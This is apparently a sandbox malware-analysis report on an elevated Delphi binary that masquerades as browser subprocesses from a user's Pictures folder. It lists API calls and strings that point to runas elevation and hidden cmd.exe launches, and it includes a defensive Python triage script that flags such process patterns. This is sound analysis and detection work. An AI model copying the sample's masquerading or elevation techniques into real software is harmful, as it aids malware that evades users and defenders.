                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Has exited:false
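The process list above shows one binary (identical MD5) running from a user's Pictures folder with several unrelated command-line personas: Chromium-style `--type=gpu-process`/`--type=renderer`/`--type=utility` switches, a `/systemstartup` switch and a bare `neto2` token, all elevated. The script below is an added triage example, not part of the Joe Sandbox report or of the sample: it parses entries in the report's own `Key:Value` layout and flags that pattern. The sample input is constructed inline (three entries transcribed from above plus one invented benign `chrome.exe` entry with a placeholder hash, included as a control); the indicator names and the scoring rule in `is_suspicious` are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample: entries transcribed from the process list above plus one
# invented benign control entry (Target ID 99, placeholder MD5), in the same
# "Key:Value" layout the report uses.
SAMPLE_REPORT = """
Target ID:20
Start time:13:04:49
Path:C:\\Users\\user\\Pictures\\fotosdaviagem\\windows10.exe
Wow64 process (32bit):true
Commandline:"C:\\Users\\user\\Pictures\\fotosdaviagem\\windows10.exe" --type=renderer--field-trial-handle=4304.754958
MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
Has elevated privileges:true
Has administrator privileges:true
Has exited:false

Target ID:21
Path:C:\\Users\\user\\Pictures\\fotosdaviagem\\windows10.exe
Commandline:"C:\\Users\\user\\Pictures\\fotosdaviagem\\windows10.exe" /systemstartup
MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
Has elevated privileges:true
Has exited:false

Target ID:29
Path:C:\\Users\\user\\Pictures\\fotosdaviagem\\windows10.exe
Commandline:"C:\\Users\\user\\Pictures\\fotosdaviagem\\windows10.exe" neto2
MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
Has elevated privileges:true
Has exited:false

Target ID:99
Path:C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
Commandline:"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --type=renderer
MD5 hash:00000000000000000000000000000000
Has elevated privileges:false
Has exited:false
"""

USER_PROFILE_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.I)
CHROMIUM_ARG_RE = re.compile(r"--type=(gpu-process|renderer|utility)", re.I)
ODD_SWITCHES = ("/systemstartup",)  # seen in the report; extend as needed


def parse_entries(text):
    """Split the report text into one dict per process (first ':' separates key/value)."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        entry = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                entry[key.strip()] = value.strip()
        if "Target ID" in entry:
            entries.append(entry)
    return entries


def classify(entry):
    """Per-entry indicators (names are this example's own labels)."""
    path = entry.get("Path", "")
    cmdline = entry.get("Commandline", "")
    hits = []
    if USER_PROFILE_RE.match(path):
        hits.append("runs_from_user_profile")
    if CHROMIUM_ARG_RE.search(cmdline):
        hits.append("chromium_style_args")
    if any(s in cmdline.lower() for s in ODD_SWITCHES):
        hits.append("startup_switch")
    if entry.get("Has elevated privileges", "").lower() == "true":
        hits.append("elevated")
    return hits


def find_suspicious(text):
    """Map Target ID -> sorted indicator list, adding a cross-entry indicator when
    the same MD5 runs under three or more distinct argument strings."""
    entries = parse_entries(text)
    by_hash = defaultdict(list)
    for e in entries:
        by_hash[e.get("MD5 hash", "")].append(e)
    findings = {}
    for e in entries:
        hits = classify(e)
        # Argument string = everything after the closing quote of the image path.
        personas = {x.get("Commandline", "").split('" ', 1)[-1] for x in by_hash[e.get("MD5 hash", "")]}
        if len(personas) >= 3:
            hits.append("many_personas_same_hash")
        findings[e["Target ID"]] = sorted(hits)
    return findings


def is_suspicious(hits):
    """Scoring rule (example's own): user-profile image plus any persona/startup oddity."""
    return "runs_from_user_profile" in hits and bool(
        {"chromium_style_args", "startup_switch", "many_personas_same_hash"} & set(hits)
    )


if __name__ == "__main__":
    for tid, hits in find_suspicious(SAMPLE_REPORT).items():
        print(tid, "SUSPICIOUS" if is_suspicious(hits) else "ok", hits)
```

A real Chromium renderer launched from `Program Files` and not elevated trips only the argument indicator, which is why the rule requires the image to live under a user profile as well; on an endpoint the same logic applies to Sysmon event 1 fields (Image, CommandLine, Hashes, IntegrityLevel).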


                                                                        Execution Graph

                                                                        Execution Coverage:1.3%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:14.1%
                                                                        Total number of Nodes:347
                                                                        Total number of Limit Nodes:9
                                                                        execution_graph (rendered as an interactive node/edge graph; the text dump keeps only node addresses and edges, so the API-calling nodes are listed here by address, grouped by routine)
                                                                        • af801c, af7711: IsProcessorFeaturePresent
                                                                        • af7b9c: SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
                                                                        • af84eb: GetStartupInfoW
                                                                        • ae1a20: GetCommandLineW
                                                                        • ad4ec0, ae0b70 (x2), ad3bbf, ad3bdb, ad2aa9, ad2ac5: LocalAlloc
                                                                        • ad21bf: HeapAlloc; b0c763: RtlAllocateHeap
                                                                        • b072ca, b115f6: EnterCriticalSection; b0c34d, b11b51, b115f6: LeaveCriticalSection
                                                                        • b0c246: GetStdHandle, GetFileType
                                                                        • ae12b0: RegOpenKeyExW; ae12ce: RegQueryValueExW (reached through ad83e0)
                                                                        • ae1400: CreateFileW, SetFilePointer, WriteFile, CloseHandle
                                                                        • ae1c26: ExitProcess; ae1c30: LocalFree (x2)
                                                                        • ad3af0: RaiseException (_com_raise_error); ad1910: LocalFree, RaiseException (_com_raise_error)
                                                                        • ad9a72, ad9eb0: LocalFree
                                                                        • ad5f90: GetCurrentProcess, OpenProcessToken; ad5fb7: GetTokenInformation; ad5fee: CloseHandle
                                                                        • ad7f70 -> ad7fd0: GetTokenInformation; ad804e: GetLastError; ad809e: GetTokenInformation
                                                                        • ad7660 (the ShellExecuteExW routine whose control-flow graph follows): ad7816 GetWindowsDirectoryW; ad78a4 GetForegroundWindow; ad78bd and ad78ed ShellExecuteExW; ad7938 GetModuleHandleW, GetProcAddress, GetProcessId, AllowSetForegroundWindow; ad7969 GetModuleHandleW, GetProcAddress; ad7995 Sleep, EnumWindows; ad79c1 BringWindowToTop; ad79dc WaitForSingleObject, GetExitCodeProcess; ad7d30 CloseHandle; ad7a85 GetWindowThreadProcessId; ad7aae GetWindowLongW
                                                                        • Nodes the sandbox summarises only as "N API calls" (no API names recoverable), with N: af83bd (4), b0854c (23), b08510 (23), b08526 (41), afae59 (10), afae78 (7), ad8790 (81), ad83e0 (14), ad3680 (42), afc5c2 (41), afc6b0 (14), afc5b2 (41), b0c190 (44), b0aa28 (14), b0cddf (6), ad3b40 (44), ad29d0 (44), ad4650 (42), ad9ef0 (45), ad3cc0 (42), b00f1e (42), ad1fc0 (67), ad6ee0 (161), ad2750 (41), ad1980 (70), ad7c30 (6), ad2510 (56), ad2100 (42), b0ae3c (41), b0b175 (41), b0b1d3 (41), b0c622 (6), b0b127 (15), af70ef (14), b00d87 (41), ad8260 (45), af7708 (5)

                                                                        Control-flow Graph (function 00AD7660; the rendered graph's executed/not-executed colouring is not preserved in the text dump)

                                                                        Basic blocks of ad7660-ad7ae8 that call APIs or subroutines, recovered from the graph:
                                                                        • ad7660-ad7728: call ad8530, call ad2100 (x2), call ad7db0
                                                                        • ad773f-ad7747: call ad2750; ad774a-ad7760: call b00d39; ad7766-ad7796: call ad2100
                                                                        • ad7816-ad7852: GetWindowsDirectoryW, call ad1980 (x2)
                                                                        • ad78a4-ad78aa: GetForegroundWindow
                                                                        • ad78b1-ad78bb: call ad7af0; ad78bd-ad78cc: ShellExecuteExW; ad78ce-ad78d9: call ad7c30
                                                                        • ad78ed-ad7907: ShellExecuteExW; ad7909-ad790d: call ad7c30
                                                                        • ad7912-ad7932: call ad7ef0
                                                                        • ad7938-ad795e: GetModuleHandleW, GetProcAddress, GetProcessId, AllowSetForegroundWindow
                                                                        • ad7969-ad7982: GetModuleHandleW, GetProcAddress
                                                                        • ad7995-ad79bf: Sleep, EnumWindows (loops back to ad7990-ad7993); ad79c1-ad79c2: BringWindowToTop
                                                                        • ad79dc-ad79ec: WaitForSingleObject, GetExitCodeProcess
                                                                        • ad79f2-ad7a12: call ad7d30
                                                                        • ad7a56-ad7a7a: call af7708
                                                                        • ad7a7b-ad7aac: call ad1910, GetWindowThreadProcessId; ad7aae-ad7ade: GetWindowLongW
                                                                        APIs
                                                                        • GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?), ref: 00AD781F
                                                                        • GetForegroundWindow.USER32(?,?), ref: 00AD78A4
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00AD78C1
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00AD78FF
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00AD7942
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AD7949
                                                                        • GetProcessId.KERNELBASE(?,?,?,?), ref: 00AD7950
                                                                        • AllowSetForegroundWindow.USER32(00000000), ref: 00AD7953
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00AD7973
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AD797A
                                                                        • Sleep.KERNEL32(00000064,?,?,?), ref: 00AD7997
                                                                        • EnumWindows.USER32(00AD7A90,?), ref: 00AD79B3
                                                                        • BringWindowToTop.USER32(?), ref: 00AD79C2
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00AD79DF
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00AD79EC
                                                                          • Part of subcall function 00AD7D30: CloseHandle.KERNEL32(?,B7207CF4,00000010,00000010,?,?), ref: 00AD7D72
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00AD7A9C
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AD7AB4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Window$HandleProcess$AddressExecuteForegroundModuleProcShellWindows$AllowBringCloseCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
                                                                        • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
                                                                        • API String ID: 105430343-986041216
                                                                        • Opcode ID: 33aeef31552eb4180e7660e59d2f8fa2ef435e2a2392ec07229233731cb71df3
                                                                        • Instruction ID: ce2d88e7c54011d39bb299dbc5f462b3c342b47827eeac40099eea5d2fa4d4a7
                                                                        • Opcode Fuzzy Hash: 33aeef31552eb4180e7660e59d2f8fa2ef435e2a2392ec07229233731cb71df3
                                                                        • Instruction Fuzzy Hash: 30E1A271A04209DFDB14DFA8C988AEEBBF5FF14310F54816AE516EB391EB349941CB60

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000008,?,B7207CF4), ref: 00AD5FA0
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00AD5FA7
                                                                        • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00AD5FDC
                                                                        • CloseHandle.KERNEL32(?), ref: 00AD5FF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                        • String ID:
                                                                        • API String ID: 215268677-0
                                                                        • Opcode ID: 6a95de52fa1e2edace98018538bf4761fc2a0ca6163b4188bb538c3267d9e30e
                                                                        • Instruction ID: f1ce71d73b008f128e4aa31db1e0fecf2a415d4d4f1d90c19bb701f5a59bdc0d
                                                                        • Opcode Fuzzy Hash: 6a95de52fa1e2edace98018538bf4761fc2a0ca6163b4188bb538c3267d9e30e
                                                                        • Instruction Fuzzy Hash: 64F01274544301ABE710DF20EC49B9AB7E8BB48704F908819FD85C2260D779D51DDA63

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCommandLineW.KERNEL32(B7207CF4,?,0000FFFF), ref: 00AE1A4D
                                                                          • Part of subcall function 00AD4EC0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,00000000,00000000,?,?), ref: 00AD4EDD
                                                                        • ExitProcess.KERNEL32 ref: 00AE1C27
                                                                          • Part of subcall function 00AD8790: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00AD880D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                        • String ID: Full command line:
                                                                        • API String ID: 1878577176-831861440
                                                                        • Opcode ID: 72a7922305b2924c2a4b003f55704b7f703502d730dfa9b99c35dc655552cc0c
                                                                        • Instruction ID: ec158330d79fba107dea3b862730f87471b18cd9c2084d52cbe58e0742a01a67
                                                                        • Opcode Fuzzy Hash: 72a7922305b2924c2a4b003f55704b7f703502d730dfa9b99c35dc655552cc0c
                                                                        • Instruction Fuzzy Hash: 095191318101689BCF15EB60CE59BEEB7B5AF55300F1441D9E00AA73A1EF745F88CBA1

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00AD7FA8,B7207CF4), ref: 00AD8044
                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00AD7FA8,B7207CF4), ref: 00AD804E
                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00AD7FA8,B7207CF4), ref: 00AD80AA
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: InformationToken$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 2567405617-0
                                                                        • Opcode ID: 89d427517b0894cbcb10513b7ff84eda7cb3f31c48b7ffe558f49eb86cf1d799
                                                                        • Instruction ID: ae990a6c684246aa7bebcda9da93db056b9d2585aaccb0997fb9e525efadf2e8
                                                                        • Opcode Fuzzy Hash: 89d427517b0894cbcb10513b7ff84eda7cb3f31c48b7ffe558f49eb86cf1d799
                                                                        • Instruction Fuzzy Hash: 6C315E71A00205AFDB24DF99CC45BAFFBF9FB44710F10452AE516A7380DBB5A9048BA0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,?,00B0AFDA,00000001,00000364,?,00000006,000000FF,?,00AFC282,?,?,?), ref: 00B0C76C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 8e776c5141470e898b8c14c936b2901176fff8e30700c602cbfbd58141e3ec2d
                                                                        • Instruction ID: aac7c2e2030a4f13b413d2ad119eb28634a609d216ffd0d7f86033f207c74c45
                                                                        • Opcode Fuzzy Hash: 8e776c5141470e898b8c14c936b2901176fff8e30700c602cbfbd58141e3ec2d
                                                                        • Instruction Fuzzy Hash: C9F054315456296AEB215B669D49A6B3FC8DB52771B248391AD04A61D0DF20DC018AE1

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00AD5F90: GetCurrentProcess.KERNEL32(00000008,?,B7207CF4), ref: 00AD5FA0
                                                                          • Part of subcall function 00AD5F90: OpenProcessToken.ADVAPI32(00000000), ref: 00AD5FA7
                                                                        • CoInitialize.OLE32(00000000), ref: 00AD6F55
                                                                        • CoCreateInstance.OLE32(00B1D310,00000000,00000004,00B2B320,00000000,?), ref: 00AD6F85
                                                                        • CoUninitialize.OLE32 ref: 00AD74F6
                                                                        • _com_issue_error.COMSUPP ref: 00AD7524
                                                                          • Part of subcall function 00AD1910: LocalFree.KERNEL32(?,B7207CF4,?,00000000,00B192C0,000000FF,?,?,00B31348,00000000,00AD16D0,80004005), ref: 00AD195C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
                                                                        • String ID: $
                                                                        • API String ID: 2507920217-3993045852
                                                                        • Opcode ID: 73f8e5b54cd4f7674ed675ec3dab3a85cbe081806fc8384234c3ccaeb7712eb0
                                                                        • Instruction ID: 6862920d640fe7f4edc5adca829475d66ef3a5835e83fbbab769f00efcc71b5f
                                                                        • Opcode Fuzzy Hash: 73f8e5b54cd4f7674ed675ec3dab3a85cbe081806fc8384234c3ccaeb7712eb0
                                                                        • Instruction Fuzzy Hash: 6B228170E04388DFEB15CFA8C948BADBBB4AF45304F14819EE406EB391EB759A45CB51
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf$FreeLocal
                                                                        • String ID: %$+
                                                                        • API String ID: 2429749586-2626897407
                                                                        • Opcode ID: acaaf90eaeddf3b475a3867a0aa921b9ad124ffd396bd3f73029ef8257a09eb4
                                                                        • Instruction ID: 37f954dff710dbd52c06bb422035be8e7cd7092c6d06778de5c9edf492d429cf
                                                                        • Opcode Fuzzy Hash: acaaf90eaeddf3b475a3867a0aa921b9ad124ffd396bd3f73029ef8257a09eb4
                                                                        • Instruction Fuzzy Hash: FA02E171E102199FDB15DFA8DD44BAEBBB5FF49300F14862AF812AB381D734A941CB91
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,-00000002,00000000,00000001,?), ref: 00AE12C4
                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00B357C0,00000800), ref: 00AE12E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQueryValue
                                                                        • String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
                                                                        • API String ID: 4153817207-1914306501
                                                                        • Opcode ID: 933222e45775a19d1aaa8bf6e04d6b1d04c44e800474d7958e4bf98db1a7bdc9
                                                                        • Instruction ID: c1338fe55b9f2265dd2707387ca17b09856a6ab2f9d4459244bf813cd893bdf9
                                                                        • Opcode Fuzzy Hash: 933222e45775a19d1aaa8bf6e04d6b1d04c44e800474d7958e4bf98db1a7bdc9
                                                                        • Instruction Fuzzy Hash: 43E1D135A043E28ACB349F16C840AB6B3E1FF95740F5985ADD949CB695EB71CCC2C3A1
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD6242
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AD6285
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AD62E1
                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00AD62FD
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AD6445
                                                                        • Process32NextW.KERNEL32(?,0000022C), ref: 00AD6463
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AD648E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 708755948-0
                                                                        • Opcode ID: c0acbe779f4382eb1e6374cec9ee096aade86f75751951995487c9b9be9f0e45
                                                                        • Instruction ID: 878345988d05be885f951281f007b8d81d2b314e01ece4bc297a84616a8a5318
                                                                        • Opcode Fuzzy Hash: c0acbe779f4382eb1e6374cec9ee096aade86f75751951995487c9b9be9f0e45
                                                                        • Instruction Fuzzy Hash: 7AA16BB1905269DBDB20DF64D948BDEBBB4EF44304F1082DAE419A7390DBB85E84CF90
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: __floor_pentium4
                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                        • API String ID: 4168288129-2761157908
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00B13EC1,00000002,00000000,?,?,?,00B13EC1,?,00000000), ref: 00B13C3C
                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00B13EC1,00000002,00000000,?,?,?,00B13EC1,?,00000000), ref: 00B13C65
                                                                        • GetACP.KERNEL32(?,?,00B13EC1,?,00000000), ref: 00B13C7A
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: ACP$OCP
                                                                        • API String ID: 2299586839-711371036
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00B13E84
                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00B13ECD
                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00B13EDC
                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B13F24
                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B13F43
                                                                        Similarity
                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                        • String ID:
                                                                        • API String ID: 415426439-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _strrchr
                                                                        • String ID:
                                                                        • API String ID: 3213747228-0
                                                                        APIs
                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00B10738
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B107B3
                                                                        • FindClose.KERNEL32(00000000), ref: 00B107D5
                                                                        • FindClose.KERNEL32(00000000), ref: 00B107F8
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$FirstNext
                                                                        • String ID:
                                                                        • API String ID: 1164774033-0
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00AF83C9
                                                                        • IsDebuggerPresent.KERNEL32 ref: 00AF8495
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AF84B5
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00AF84BF
                                                                        Similarity
                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                        • String ID:
                                                                        • API String ID: 254469556-0
                                                                        APIs
                                                                        • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,?,00AD3270,?), ref: 00AE2176
                                                                        • FormatMessageA.KERNEL32(00001300,00000000,B7207CF4,00000000,00000000,00000000,00000000,?,?,?,00AD3270,?), ref: 00AE2198
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: FormatInfoLocaleMessage
                                                                        • String ID: !x-sys-default-locale
                                                                        • API String ID: 4235545615-2729719199
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
